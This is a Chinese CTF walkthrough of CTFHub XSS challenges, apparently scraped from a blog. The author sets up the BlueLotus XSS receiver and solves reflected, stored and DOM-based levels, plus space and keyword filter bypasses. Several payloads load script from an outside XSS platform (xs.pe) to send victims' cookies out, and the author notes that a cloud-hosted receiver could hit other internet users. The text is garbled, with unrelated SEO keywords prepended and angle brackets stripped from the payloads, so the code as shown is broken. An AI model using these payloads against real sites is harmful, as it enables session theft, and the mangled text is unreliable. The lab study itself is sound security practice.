东光县建设局网站,软件开发的前景,深圳专业专业网站建设,如何用文件传输协议登陆网站一、搭建XSS平台
安装
1、我这里安装在本地的Phpstudy上#xff0c;安装过程就是一路下一步#xff08;可以改安装路径#xff09;#xff0c;附上下载链接#xff1a;
# 官网#xff1a;https://www.xp.cn/download.html# 蓝莲花 - github下载
https://github.com/fi…一、搭建XSS平台
安装
1、我这里安装在本地的Phpstudy上安装过程就是一路下一步可以改安装路径附上下载链接
# 官网https://www.xp.cn/download.html# 蓝莲花 - github下载
https://github.com/firesunCN/BlueLotus_XSSReceiver
phpstudy安装完成后启动服务
将解压后的BlueLotus_XSSReceiver原代码放置 phpstudy 安装目录的WWW文件夹 然后在浏览器中输入http://本机ip/BlueLotus_XSSReceiver-master # 访问我们刚才拉到www文件夹下的BlueLotus_XSSReceiver文件进入安装界面 2、配置XSS接收平台 - 蓝莲花
插入模板 填写接收数据的url 格式当前蓝莲花平台的url 文件名文件名自己取 示例 最后选择生成paload 测试一下 3、将攻击语句复制保存下来等下要用
script srchttp://127.0.0.1/BlueLotus_XSSReceiver-master/myjs/text.js/script 攻击演示
本地演示
突然想到一个问题我刚才制作的攻击语句中的IP是本地的回环地址所以如果我在虚拟机的靶场中测试攻击那么我的蓝莲花平台是接收不到的所以这里先在本地的靶场测试等下在演示在虚拟机中的如果蓝莲花平台部署在云服务器就能攻击其他互联网用户 解除输入框的字符限制 回到平台查看攻击 点击查看邮件信息 虚拟机演示
ipconfig # 查看本机ip 使用本机IP访问蓝莲花平台测试看看 重新构造攻击paload script srchttp://192.168.100.58//BlueLotus_XSSReceiver-master/myjs/text.js/script 回到平台 二、反射型
1首先尝试用蓝莲花xss平台打cookie但是不知道哪个步骤出现问题老是获取不了cookie 示例payload 获取响应 结果就是没有cookie不知道哪个环境出现问题 2尝试了大佬的在线xss平台成功了。自己重新搭建了一个另一个xss平台也成功拿到flag需要在docker容器搭建不演示了)但是蓝莲花的这个问题一直没有被解决就是很垃圾
在线xss平台:https://xssaq.com/该平台主机上线有提示语音并且功能比蓝莲花和我搭建的另一个xss平台都好所以就借助大佬搭建的xss平台作为本期演示平台 成功拿到flag 三、存储型
1)将payload上传到第一个输入框 此时主机上线不携带cookie 将url输入到第二个输入框xss平台提示上线成功,此时携带cookie 还能看到当前的网页截屏 四、DOM反射
1首先插入scriptalert(1)/script发现攻击不成功而返回的是;我们查看源码发现需要构造闭合 /scriptscriptalert(1)/script 发现成功了! 构造payload/scriptsCRiPt sRC//xs.pe/cqW/sCrIpT获取flag 五、DOM跳转
1首先尝试,不成功尝试构造js语句http://challenge-1ccc67ea8612a9b6.sandbox.ctfhub.com:10800?jumptojavascript:alert(1) 发现成功了那么直接使用xss平台获取cookiehttp://challenge-1ccc67ea8612a9b6.sandbox.ctfhub.com:10800/?jumptojavascript:$.getScript(//xs.pe/cqW) 拿到flag
六、过滤空格
1使用paylod发现空格被过滤了sCRiPt sRC//xs.pe/cqW/sCrIpT 2直接使用/**/代替空格即可绕过
sCRiPt/**/sRC//xs.pe/cqW/sCrIpT 拿到flag 七、过滤关键词
(1)正交提交脚本测试发现将scr开头的单词全部替换为空 2尝试了双写不行那就尝试一下大小写吧好像可以直接注入payload拿到flag
